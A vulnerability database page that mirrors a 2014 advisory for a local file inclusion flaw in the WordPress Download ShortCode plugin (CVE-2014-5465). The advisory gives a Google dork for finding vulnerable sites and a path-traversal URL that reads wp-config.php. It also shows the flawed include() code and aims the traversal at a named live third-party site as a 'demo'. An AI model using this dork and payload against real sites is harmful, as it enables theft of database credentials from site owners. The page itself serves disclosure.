Lucene search
K

WordPress ShortCode 0.2.3 Local File Inclusion

🗓️ 26 Aug 2014 00:00:00Reported by Christian GaleoneType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

WordPress ShortCode Plugin - Local File Inclusion Vulnerability with High+/Critical Severity, CVE-2014-546

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability
28 Aug 201400:00
zdt
Circl
CVE-2014-5465
28 Aug 201400:00
circl
CVE
CVE-2014-5465
3 Sep 201419:00
cve
Cvelist
CVE-2014-5465
3 Sep 201419:00
cvelist
Exploit DB
WordPress Plugin ShortCode 0.2.3 - Local File Inclusion
28 Aug 201400:00
exploitdb
exploitpack
WordPress Plugin ShortCode 0.2.3 - Local File Inclusion
28 Aug 201400:00
exploitpack
NVD
CVE-2014-5465
3 Sep 201419:55
nvd
OpenVAS
WordPress ShortCode Plugin Directory Traversal Vulnerability
8 Sep 201400:00
openvas
Patchstack
WordPress ShortCode Plugin 0.2.3 - Local File Inclusion
28 Aug 201400:00
patchstack
Prion
Directory traversal
3 Sep 201419:55
prion
Rows per page
`#################################################################################################  
#  
# Title : WordPress ShortCode Plugin - Local File Inclusion Vulnerability  
# Severity : High+/Critical  
# Reporter(s) : Mehdi Karout & Christian Galeone  
# Google Dork : inurl:wp/wp-content/force-download.php  
# Plugin Version : 0.2.3  
# Plugin Name : Download ShortCode  
# Vendor Home : http://werdswords.com/  
# Date : 25/08/2014  
# Tested in : Win7 - Kali Linux  
# CVE : CVE-2014-5465  
#  
##################################################################################################  
#  
# PoC :  
#  
#  
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=[File]  
#  
# http://localhost:80/wordpress/wp/wp-content/force-download.php?file=../wp-config.php  
#  
# Exploit Code :  
#  
# $file = $_GET['file'];  
# if(isset($file))  
# {  
# include("pages/$file");  
# }  
# else  
# {  
# include("index.php");  
# }  
#   
# Demo :  
#  
# http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php  
#  
##################################################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation